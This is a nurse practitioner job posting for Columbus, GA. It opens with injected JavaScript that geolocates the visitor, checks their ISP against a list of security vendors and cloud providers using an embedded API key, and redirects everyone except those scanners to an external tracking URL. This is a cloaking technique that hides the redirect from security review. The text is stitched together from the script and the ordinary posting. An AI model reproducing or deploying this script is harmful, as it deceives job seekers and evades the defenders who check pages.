Job Description
// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/d77551e5409ae53f/6e4da239321af4a21acdddcff128fae9febae5347fc9c5c5b7e6b9cf4873527f/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });We seek a dedicated Wound Care Nurse Practitioner to assess, diagnose, and treat patients with various wounds, providing compassionate and evidence-based care.
Responsibilities include conducting assessments, developing treatment plans, performing wound procedures such as dressing changes and debridement, documenting accurately, collaborating with healthcare teams, educating patients and families, and participating in quality improvement initiatives.
Requirements include a current Nurse Practitioner license with wound care specialization, experience with advanced wound care techniques like skin grafts, proficiency in medical documentation, and strong communication skills. Knowledge of diabetes management and ability to lift patients are a plus.
This part-time, contract role offers flexible hours (4–12/week), hourly pay ($80–$120), benefits, and potential travel within Columbus, GA. Candidates must be able to commute or relocate to Columbus, GA, and have at least one year of wound care experience.
Join our team to make a meaningful impact through expert patient care.